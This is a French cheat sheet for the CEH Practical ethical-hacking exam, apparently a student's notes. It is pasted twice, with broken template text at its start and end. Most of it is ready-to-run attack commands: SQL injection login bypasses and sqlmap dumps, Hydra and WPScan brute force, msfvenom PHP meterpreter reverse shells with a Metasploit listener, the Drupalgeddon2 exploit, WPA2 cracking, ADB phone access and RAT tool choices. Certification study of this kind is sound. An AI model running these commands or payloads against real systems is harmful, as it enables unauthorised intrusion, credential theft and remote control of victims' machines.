CommencCEH Practical — Pense-bête
Certified Ethical Hacker | Commandes & outils essentiels
🔍 Nmap — Reconnaissance
Trouver le contrôleur de domaine (Kerberos 88 + LDAP 389) :
nmap -p 88,389 192.168.0.0/24 --open
Scan agressif — FQDN / DNS computer name :
nmap -A <IP>
Version des services / Vulnérabilités CVE :
nmap -sV <IP>
nmap --script vuln <IP>
nmap -Pn consider ell hote actif si jamais icmp est bloquer par le pare feu
Ports clés à retenir :
|
88 Kerberos |
389 LDAP |
445/139 SMB |
22 SSH |
|
21 FTP |
110 POP3 |
5555 ADB |
3389 RDP |
🔹 Toujours ajouter --open pour n'afficher que les ports ouverts = résultats clairs.
💉 SQLmap — Injection SQL ()
Se connecter sur le site donné avec le login admin. Si les logins ne sont pas donnés, aller dans SQL Injection et taper :
User 'or 1=1 --
user 'or 1=1 # (cette lettre en Low Security)
Récupérer l'URL, puis :
Méthode 1 — avec cookie (clique droit Inspecter → Console → document.cookie) :
sqlmap -u "URL" --cookie="COOKIE" –dbs -D XXX --tables / --dump
Lister les databases présentes — exemple :
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie copié à l'étape 7]" -D moviescope --tables
Lister / dumper les users — exemple :
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie copié à l'étape 7]" -D moviescope -T User_Login --dump
Méthode 2 — avec Burp Suite (sauvegarder la requête en .txt) :
sqlmap -r sql.txt --dbs
sqlmap -r sql.txt --dbs --batch
Lister les tables d'une base / tout dumper :
sqlmap -u "URL" --cookie="..." -D <database> --tables
Bypass login sans identifiants (SQLi) :
' or 1=1--
' or 1=1#
🔹 Si bloqué → chercher "SQL injection cheat sheet GitHub" pour d'autres payloads.
OWAS ZAp sur zaproxy.org installer sur kali ou windows utiliser automated scan avec l’url et faire un active scan toutes les failles sont indiqué dans alers (icone drapeau orange)
💪 Hydra — Brute force
|
-l username unique |
-L fichier usernames |
-p password unique |
-P fichier passwords |
hydra -L users.txt -P pass.txt smb://<IP>
hydra -l martin -P pass.txt ssh://<IP>
hydra -L users.txt -P pass.txt rdp://<IP>
hydra -L users.txt -P pass.txt ftp://<IP>
🔹 Scans longs → lance-les et réponds aux autres questions pendant ce temps !
🦈 Wireshark — Analyse réseau
Ouvrir un fichier .cap :
wireshark fichier.cap
Filtres utiles :
mqtt ← IoT port 1883
http ← HTTP
ip.dst == 192.168.x.x ← attaque DoS vers IP cible
ip.src == 192.168.x.x ← paquets de l'attaquant
http.request.method == POST pour trouver les demandes de login et mot de passe (clik droit sur la ligne follow puis rcp stream pour voir les infos)
tcp.flags.syn == 1 and tcp.flags.ack == 0 (on peut voir les stats dans statistic ipv4 stats source and destiantions adresses
Chercher un mot de passe dans les paquets :
Ctrl+F → Packet details → String → tapez: pwd
🔹 Statistics → Endpoints pour voir UDP/TCP/IPv4/IPv6.
🎯 Metasploit & msfvenom — Exploitation
Générer un reverse shell PHP :
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -o shell.php
Lancer le listener :
msfconsole -x "use exploit/multi/handler; \
set payload php/meterpreter/reverse_tcp; \
set LHOST <IP>; set LPORT 4444; run"
Exploiter Drupal (drupalgeddon2) :
search drupal → use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS <IP>
show targets → set target 0 / 1 / 2 ...
run
🖼️ Stéganographie
|
BMP → OpenStego (GUI) |
JPG/autres → steghide |
steghide extract -sf fichier.jpg
steghide extract -sf fichier.jpg -p <password>
openstego.com pour télécharger le logiciel
🔹 OpenStego (BMP) : cliquer Extract Data → sélectionner le fichier → Extract.
Sur windows Snow marche aussi telecahrger snow version 32 bits sur darkside.com.au/snow
Dezipper le fichier zip et en ligne de commande lancer snow exemple : snow -c -P « mot de passe » fichier.txt
🔐 Hash & Cryptographie
Sites en ligne :
1. hashes.com 2. crackstation.net 3. John / hashcat avec wordlist
John the Ripper :
john --wordlist=<wordlist.txt> <hash.txt>
Hash d'un fichier (Linux) :
md5sum fichier.txt | sha256sum fichier.txt
sha384sum fichier.txt | crc32 fichier.txt
Hash d'un fichier (Windows PowerShell) :
Get-FileHash fichier.txt -Algorithm SHA256 (POWERSHELL COMMANDE)
🔹 VeraCrypt : sélectionner volume → choisir lettre → Mount → mot de passe.
🔹 CryptoForge : clic droit sur fichier → Decrypt → mot de passe.
Pour hasher un fichier hashcalc hashcalc.softonic.com
Bctextencoder usr downloadcnet.com pour encoder du text
Cryptool sur le meme principe sur cryptool.org
📱 Android — FonePaw Pro
Trouver l'appareil (ADB port 5555) :
nmap -p 5555 192.168.0.0/24 --open
🔹 FonePaw : 1. Connecter (opt. 1) → 2. Shell (opt. 14) → cd sdcard → explorer → 3. Quitter shell → opt. 8 pour télécharger.
Connecter en shell avec adb en shell :
Adb connect adresseip:5555 puis taper adb shell pour rentrer sur le terminal adb pull pr telecharger
Phonesploit pro :
Chercher phonsploit pro (/home/attacker/Phonesploit-pro)
Python3 phonesploit.py
📶 Aircrack-ng — Wi-Fi
aircrack-ng fichier.cap -w wordlist.txt
exemple : aircrack-ng -a2 -b [SSID] -w[pwd.txt] [pcapfile] popur du WPA2
📁 Transfert de fichiers
Linux → Windows (Python HTTP) :
python3 -m http.server 8000 → http://<IP_Linux>:8000 sur Windows
Linux → Windows (Apache) :
cp fichier /var/www/html/share/ && service apache2 start
→ http://<IP_Linux>/share/fichier sur Windows
🔹 Windows → Linux : Places → Network → smb://<IP_Windows> → identifiants → copier.
🗂️ Divers — Autres outils
exiftool fichier.jpg ← métadonnées image/fichier
remmina → IP → user/pass ← RDP vers Windows
nslookup <domaine> ← résolution DNS
nslookup + MX Toolbox ← infos DNS avancées
🔹 IDOR : modifier ?id= ou ?page= dans l'URL pour accéder à d'autres ressources.
🔹 Ressources autorisées : hashes.com · crackstation.net · mxtoolbox.com · GitHub cheatsheets · Google · IA (avec accord du surveillant).
INJECTION de de fichier sur serveur cible :
Searchsploit pour trouver des vunlebarivilté
Utiliser msfvenom pour créer le virus
Msfvenom -p php/meterpreter/reverse_tcp lhost=ip_cible lport=XXX -o xxx.xx
Puis msfconsole pour paramétrer le payload
Créer un partage entre linux et windows :
mkdir /var/www/html/share
chmod 777 /var/www/html/share
cp « fichier » /var/www/html/share
service apache2 start
sinon utiliser filetrasnfer : https://filetransfert.io
Banner grabiing : utiliser telnet
Telnet ip 80 ou 80 ou 443
GET / HTTP/1.1
Host : adresseip ou url
SCAN DE SITE WEB URL :
Scan global
wpscan --url url ou adresse ip
Enumeration et recherche d’uitilisateurs
wpscan –url « url ou adresse ip » -e -u Enumeration et users
Tentative de burtue force :
wpscan –url « url ou adresse ip » --usernames /home/chemin../users.txt –passwords /home/chemin…/passwirds.txt
exemple :
Lire metadata sur les fichiers image : exitftool
CRYPTOGRAPHIE :
COMMENT UTILISER METASPLOIT si wpscan fail :
Dans le terminal :
>msfconsole
>use auxiliary/scanner/http/wordpress_login_enum (if failed essaye : use wordpress pour lister les metasploit de wordpress)
>show options
>set RHOST ip de la cible
>set RPORT port de la cible
>set PASS_FILE /homme/chemin…/pass.txt
>set USERNAME user de la cible
>set TARGETURI http://adressip:8080/
>exploit pour lancer l’attaque
Calcul entropy : apt get ent , puis faire ent fichier pour avoir le score de chaos
Shaxxxsum fichier pour calculer le has encrypt
CVE.mitre.org
CVSS = score de vulnerabilité
Nmap -Pn –script vuln 192.x.x.x
Get LDAP version:
ldapsearch -x -H ldap://192.168.0.X
Rappels pour l'examen
🔹 Durée : 6 heures — gère bien ton temps.
🔹 Lance les scans longs (Hydra, Nmap) et réponds aux autres questions en parallèle.
🔹 Complète les labs C|EH Engage 2-3 fois AVANT l'examen.
🔹 Tu peux utiliser tes propres notes, Google et des outils IA (avec accord du surveillant).
🔹 Lis attentivement chaque question — le format de réponse attendu est précisé.
Une liste des commandes les plus utilié https://github.com/sariamubeen/CEH-Practical-Exam
🔹 Si un exploit ne fonctionne pas (ex. Drupal), essaie show targets puis change la valeur.drupal_drupalgeddon2 ou drupal_cider_exec
🔹 En cas de doute sur C|EH Engage, commente sous la vidéo ou cherche sur Google.
NMAP and enumeration tips :
Enumeration & Reconnaissance
Identify live machines on a subnet:
nmap -sn 192.168.0.0/24
Detect open ports:
nmap -p- 192.168.0.X
Find Domain Controller:
nmap -p 389, 636, 88, 3268 192.168.0.0/24
Get NetBIOS and FQDN:
nmap -sC 192.168.0.X --top-ports=20
Find OpenSSH version:
nmap -p 22 192.168.0.0/24 --open -T5 -sV
Detect OS:
Step 1: nmap -p 3306 192.168.0.X --open
Step 2: nmap -O 192.168.0.X -sV -T5
LDAP Enumeration (user count):
nmap 192.168.0.X --script=*user*
Get LDAP version:
ldapsearch -x -H ldap://192.168.0.X
Service Discovery
Check if NFS is enabled:
nmap -p 111 192.168.0.0/24 --open
DNS enumeration:
nslookup -type=ns www.certifiedhacker.com
Find SMTP service machine:
nmap -p 25 192.168.0.0/24 --open -T5
SMB enumeration (check message signing):
nmap -p 445 192.168.0.X -sC -T5
CEH Practical — Pense-bête
Certified Ethical Hacker | Commandes & outils essentiels
🔍 Nmap — Reconnaissance
Trouver le contrôleur de domaine (Kerberos 88 + LDAP 389) :
nmap -p 88,389 192.168.0.0/24 --open
Scan agressif — FQDN / DNS computer name :
nmap -A <IP>
Version des services / Vulnérabilités CVE :
nmap -sV <IP>
nmap --script vuln <IP>
nmap -Pn consider ell hote actif si jamais icmp est bloquer par le pare feu
Ports clés à retenir :
|
88 Kerberos |
389 LDAP |
445/139 SMB |
22 SSH |
|
21 FTP |
110 POP3 |
5555 ADB |
3389 RDP |
🔹 Toujours ajouter --open pour n'afficher que les ports ouverts = résultats clairs.
💉 SQLmap — Injection SQL ()
Se connecter sur le site donné avec le login admin. Si les logins ne sont pas donnés, aller dans SQL Injection et taper :
User 'or 1=1 --
user 'or 1=1 # (cette lettre en Low Security)
Récupérer l'URL, puis :
Méthode 1 — avec cookie (clique droit Inspecter → Console → document.cookie) :
sqlmap -u "URL" --cookie="COOKIE" –dbs -D XXX --tables / --dump
Lister les databases présentes — exemple :
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie copié à l'étape 7]" -D moviescope --tables
Lister / dumper les users — exemple :
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie copié à l'étape 7]" -D moviescope -T User_Login --dump
Méthode 2 — avec Burp Suite (sauvegarder la requête en .txt) :
sqlmap -r sql.txt --dbs
sqlmap -r sql.txt --dbs --batch
Lister les tables d'une base / tout dumper :
sqlmap -u "URL" --cookie="..." -D <database> --tables
Bypass login sans identifiants (SQLi) :
' or 1=1--
' or 1=1#
🔹 Si bloqué → chercher "SQL injection cheat sheet GitHub" pour d'autres payloads.
OWAS ZAp sur zaproxy.org installer sur kali ou windows utiliser automated scan avec l’url et faire un active scan toutes les failles sont indiqué dans alers (icone drapeau orange)
💪 Hydra — Brute force
|
-l username unique |
-L fichier usernames |
-p password unique |
-P fichier passwords |
hydra -L users.txt -P pass.txt smb://<IP>
hydra -l martin -P pass.txt ssh://<IP>
hydra -L users.txt -P pass.txt rdp://<IP>
hydra -L users.txt -P pass.txt ftp://<IP>
🔹 Scans longs → lance-les et réponds aux autres questions pendant ce temps !
🦈 Wireshark — Analyse réseau
Ouvrir un fichier .cap :
wireshark fichier.cap
Filtres utiles :
mqtt ← IoT port 1883
http ← HTTP
ip.dst == 192.168.x.x ← attaque DoS vers IP cible
ip.src == 192.168.x.x ← paquets de l'attaquant
http.request.method == POST pour trouver les demandes de login et mot de passe (clik droit sur la ligne follow puis rcp stream pour voir les infos)
tcp.flags.syn == 1 and tcp.flags.ack == 0 (on peut voir les stats dans statistic ipv4 stats source and destiantions adresses
Chercher un mot de passe dans les paquets :
Ctrl+F → Packet details → String → tapez: pwd
🔹 Statistics → Endpoints pour voir UDP/TCP/IPv4/IPv6.
🎯 Metasploit & msfvenom — Exploitation
Générer un reverse shell PHP :
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -o shell.php
Lancer le listener :
msfconsole -x "use exploit/multi/handler; \
set payload php/meterpreter/reverse_tcp; \
set LHOST <IP>; set LPORT 4444; run"
Exploiter Drupal (drupalgeddon2) :
search drupal → use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS <IP>
show targets → set target 0 / 1 / 2 ...
run
🖼️ Stéganographie
|
BMP → OpenStego (GUI) |
JPG/autres → steghide |
steghide extract -sf fichier.jpg
steghide extract -sf fichier.jpg -p <password>
openstego.com pour télécharger le logiciel
🔹 OpenStego (BMP) : cliquer Extract Data → sélectionner le fichier → Extract.
Sur windows Snow marche aussi telecahrger snow version 32 bits sur darkside.com.au/snow
Dezipper le fichier zip et en ligne de commande lancer snow exemple : snow -c -P « mot de passe » fichier.txt
🔐 Hash & Cryptographie
Sites en ligne :
1. hashes.com 2. crackstation.net 3. John / hashcat avec wordlist
John the Ripper :
john --wordlist=<wordlist.txt> <hash.txt>
Hash d'un fichier (Linux) :
md5sum fichier.txt | sha256sum fichier.txt
sha384sum fichier.txt | crc32 fichier.txt
Hash d'un fichier (Windows PowerShell) :
Get-FileHash fichier.txt -Algorithm SHA256 (POWERSHELL COMMANDE)
🔹 VeraCrypt : sélectionner volume → choisir lettre → Mount → mot de passe.
🔹 CryptoForge : clic droit sur fichier → Decrypt → mot de passe.
Pour hasher un fichier hashcalc hashcalc.softonic.com
Bctextencoder usr downloadcnet.com pour encoder du text
Cryptool sur le meme principe sur cryptool.org
📱 Android — FonePaw Pro
Trouver l'appareil (ADB port 5555) :
nmap -p 5555 192.168.0.0/24 --open
🔹 FonePaw : 1. Connecter (opt. 1) → 2. Shell (opt. 14) → cd sdcard → explorer → 3. Quitter shell → opt. 8 pour télécharger.
Connecter en shell avec adb en shell :
Adb connect adresseip:5555 puis taper adb shell pour rentrer sur le terminal adb pull pr telecharger
Phonesploit pro :
Chercher phonsploit pro (/home/attacker/Phonesploit-pro)
Python3 phonesploit.py
📶 Aircrack-ng — Wi-Fi
aircrack-ng fichier.cap -w wordlist.txt
exemple : aircrack-ng -a2 -b [SSID] -w[pwd.txt] [pcapfile] popur du WPA2
📁 Transfert de fichiers
Linux → Windows (Python HTTP) :
python3 -m http.server 8000 → http://<IP_Linux>:8000 sur Windows
Linux → Windows (Apache) :
cp fichier /var/www/html/share/ && service apache2 start
→ http://<IP_Linux>/share/fichier sur Windows
🔹 Windows → Linux : Places → Network → smb://<IP_Windows> → identifiants → copier.
🗂️ Divers — Autres outils
exiftool fichier.jpg ← métadonnées image/fichier
remmina → IP → user/pass ← RDP vers Windows
nslookup <domaine> ← résolution DNS
nslookup + MX Toolbox ← infos DNS avancées
🔹 IDOR : modifier ?id= ou ?page= dans l'URL pour accéder à d'autres ressources.
🔹 Ressources autorisées : hashes.com · crackstation.net · mxtoolbox.com · GitHub cheatsheets · Google · IA (avec accord du surveillant).
INJECTION de de fichier sur serveur cible :
Searchsploit pour trouver des vunlebarivilté
Utiliser msfvenom pour créer le virus
Msfvenom -p php/meterpreter/reverse_tcp lhost=ip_cible lport=XXX -o xxx.xx
Puis msfconsole pour paramétrer le payload
Créer un partage entre linux et windows :
mkdir /var/www/html/share
chmod 777 /var/www/html/share
cp « fichier » /var/www/html/share
service apache2 start
sinon utiliser filetrasnfer : https://filetransfert.io
Banner grabiing : utiliser telnet
Telnet ip 80 ou 80 ou 443
GET / HTTP/1.1
Host : adresseip ou url
PRIVILEGE ESCALATION :
sudo -i pour passer en root.
taper whoami pour veirifer qu'on est bien root user
SCAN DE SITE WEB URL :
Scan global
wpscan --url url ou adresse ip
Enumeration et recherche d’uitilisateurs
wpscan –url « url ou adresse ip » -e -u Enumeration et users
Tentative de burtue force :
wpscan –url « url ou adresse ip » --usernames /home/chemin../users.txt –passwords /home/chemin…/passwirds.txt
Lire metadata sur les fichiers image : exitftool
CRYPTOGRAPHIE :
COMMENT UTILISER METASPLOIT si wpscan fail :
Dans le terminal :
>msfconsole
>use auxiliary/scanner/http/wordpress_login_enum (if failed essaye : use wordpress pour lister les metasploit de wordpress)
>show options
>set RHOST ip de la cible
>set RPORT port de la cible
>set PASS_FILE /homme/chemin…/pass.txt
>set USERNAME user de la cible
>set TARGETURI http://adressip:8080/
>exploit pour lancer l’attaque
Calcul entropy : apt get ent , puis faire ent fichier pour avoir le score de chaos
Shaxxxsum fichier pour calculer le has encrypt
CVE.mitre.org
CVSS = score de vulnerabilité
Nmap -Pn –script vuln 192.x.x.x
Get LDAP version:
ldapsearch -x -H ldap://192.168.0.X
RAT TOOLS TO USE :
Utiliser prorat uniquement si le mot de passe est fourni sinon njrat ou httprat
Rappels pour l'examen
🔹 Durée : 6 heures — gère bien ton temps.
🔹 Lance les scans longs (Hydra, Nmap) et réponds aux autres questions en parallèle.
🔹 Complète les labs C|EH Engage 2-3 fois AVANT l'examen.
🔹 Tu peux utiliser tes propres notes, Google et des outils IA (avec accord du surveillant).
🔹 Lis attentivement chaque question — le format de réponse attendu est précisé.
Une liste des commandes les plus utilié https://github.com/sariamubeen/CEH-Practical-Exam
🔹 Si un exploit ne fonctionne pas (ex. Drupal), essaie show targets puis change la valeur.drupal_drupalgeddon2 ou drupal_cider_exec
🔹 En cas de doute sur C|EH Engage, commente sous la vidéo ou cherche sur Google.
NMAP and enumeration tips :
Enumeration & Reconnaissance
Identify live machines on a subnet:
nmap -sn 192.168.0.0/24
Detect open ports:
nmap -p- 192.168.0.X
Find Domain Controller:
nmap -p 389, 636, 88, 3268 192.168.0.0/24
Get NetBIOS and FQDN:
nmap -sC 192.168.0.X --top-ports=20
Find OpenSSH version:
nmap -p 22 192.168.0.0/24 --open -T5 -sV
Detect OS:
Step 1: nmap -p 3306 192.168.0.X --open
Step 2: nmap -O 192.168.0.X -sV -T5
LDAP Enumeration (user count):
nmap 192.168.0.X --script=*user*
Get LDAP version:
ldapsearch -x -H ldap://192.168.0.X
Service Discovery
Check if NFS is enabled:
nmap -p 111 192.168.0.0/24 --open
DNS enumeration:
nslookup -type=ns www.certifiedhacker.com
Find SMTP service machine:
nmap -p 25 192.168.0.0/24 --open -T5
SMB enumeration (check message signing):
nmap -p 445 192.168.0.X -sC -T5
ez à écrire ici ...